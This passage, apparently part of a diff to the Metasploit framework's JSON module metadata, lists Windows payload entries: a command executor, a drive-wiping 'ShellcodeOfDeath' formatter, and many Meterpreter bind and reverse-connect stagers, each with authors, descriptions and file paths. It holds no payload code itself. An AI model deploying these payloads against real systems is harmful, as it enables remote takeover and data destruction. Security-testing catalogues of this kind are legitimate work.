"/modules/payloads/singles/windows/exec.rb", + "is_install_path": true, + "ref_name": "windows/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/format_all_drives": { + "name": "Windows Drive Formatter", + "fullname": "payload/windows/format_all_drives", + "aliases": [], + "rank": 0, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ashfaq Ansari ", + "Ruei-Min Jiang " + ], + "description": "This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).\n\n After formatting, this payload sets the volume label to the string specified in\n the VOLUMELABEL option. If the code is unable to access a drive for any reason,\n it skips the drive and proceeds to the next volume.", + "references": [ + "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", + "URL-https://github.com/hacksysteam/ShellcodeOfDeath" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/format_all_drives.rb", + "is_install_path": true, + "ref_name": "windows/format_all_drives", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ShellcodeOfDeath" + ] + }, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/loadlibrary": { + "name": "Windows LoadLibrary Path", + "fullname": "payload/windows/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Load an arbitrary library path", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/loadlibrary.rb", + "is_install_path": true, + "ref_name": "windows/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/messagebox": { + "name": "Windows MessageBox", + "fullname": "payload/windows/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "corelanc0d3r ", + "jduck " + ], + "description": "Spawns a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-11-28 06:39:07 +0000", + "path": "/modules/payloads/singles/windows/messagebox.rb", + "is_install_path": true, + "ref_name": "windows/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter/bind_hidden_ipknock_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/meterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/meterpreter/bind_hidden_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager", + "fullname": "payload/windows/meterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/meterpreter/bind_ipv6_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/meterpreter/bind_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/meterpreter/bind_nonx_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/meterpreter/bind_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/meterpreter/bind_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/meterpreter/bind_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/meterpreter/find_tag": { + "name": "Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager", + "fullname": "payload/windows/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/meterpreter/reverse_http": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/meterpreter/reverse_http_proxy_pstore": { + "name": "Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy", + "fullname": "payload/windows/meterpreter/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_windows/meterpreter/reverse_https": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/windows/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_https" + }, + "payload_windows/meterpreter/reverse_ipv6_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/meterpreter/reverse_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_windows/meterpreter/reverse_nonx_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/meterpreter/reverse_ord_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/meterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "spoonm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/meterpreter/reverse_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager", + "fullname": "payload/windows/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/meterpreter/reverse_tcp_allports": { + "name": "Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager", + "fullname": "payload/windows/meterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/meterpreter/reverse_tcp_dns": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)", + "fullname": "payload/windows/meterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/meterpreter/reverse_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/meterpreter/reverse_tcp_rc4_dns": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/meterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/meterpreter/reverse_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
